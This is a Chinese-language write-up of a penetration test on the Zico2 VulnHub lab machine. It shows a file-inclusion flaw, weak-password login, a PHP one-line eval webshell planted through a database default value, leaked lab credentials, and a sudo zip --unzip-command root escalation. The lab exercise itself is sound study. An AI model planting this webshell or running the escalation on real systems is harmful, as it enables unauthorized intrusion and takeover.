ZICO靶机渗透测试记录

admin 2022年4月15日09:46:08安全文章评论27 views786字阅读2分37秒阅读模式


靶机地址:https://www.vulnhub.com/entry/zico2-1,210/

目标:获取root并读取标志文件

网络环境:vmware NAT模式

攻击机:192.168.19.130

靶机:192.168.19.137

对靶机进行端口扫描:

ZICO靶机渗透测试记录

访问80端口:

ZICO靶机渗透测试记录

用burpsuite扫描网站:

ZICO靶机渗透测试记录

发现存在文件包含漏洞:

ZICO靶机渗透测试记录

进一步验证:

ZICO靶机渗透测试记录

使用dirb扫描目录:

ZICO靶机渗透测试记录

发现敏感目录,并打开:

ZICO靶机渗透测试记录

ZICO靶机渗透测试记录

弱密码admin登录:

ZICO靶机渗透测试记录

创建test01.php数据库,添加abc表,增加content字段,默认值为一句话木马:

<?php @eval($_POST[cmd]);?>

ZICO靶机渗透测试记录

利用文件包含漏洞连接test01.php:

ZICO靶机渗透测试记录

发现只是普通用户,并非管理员用户。

提权步骤:

找到配置wordpress文件:

ZICO靶机渗透测试记录

发现mysql数据库的用户名和密码:

ZICO靶机渗透测试记录

zico和sWfCsfJSPV9H3AmQzw8远程登录:

ZICO靶机渗透测试记录

执行sudo -l和whoami

ZICO靶机渗透测试记录

提权:

touch /tmp/exploit

sudo -u root zip /tmp/exploit.zip /tmp/exploit -T--unzip-command="sh -c /bin/bash"

ZICO靶机渗透测试记录

ZICO靶机渗透测试记录

备注PS:

sudo -l            //当前用户在sudo组中可执行的命令

touch /tmp/exploit     //在/tmp目录下新建一个exploit文件

sudo zip exploit.zip exploit -T --unzip-command="python -c 'importpty; pty.spawn("/bin/sh")'"   //在exploit文件中写入代码;sudo 用管理员权限执行 ;-T 检查文件的完整性,这个参数可以让它执行下一个参数;--unizp-command 在这个参数中写入一个python的交互式shell

原文始发于微信公众号(CTS纵横安全实验室):ZICO靶机渗透测试记录

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月15日09:46:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  ZICO靶机渗透测试记录 http://cn-sec.com/archives/873597.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: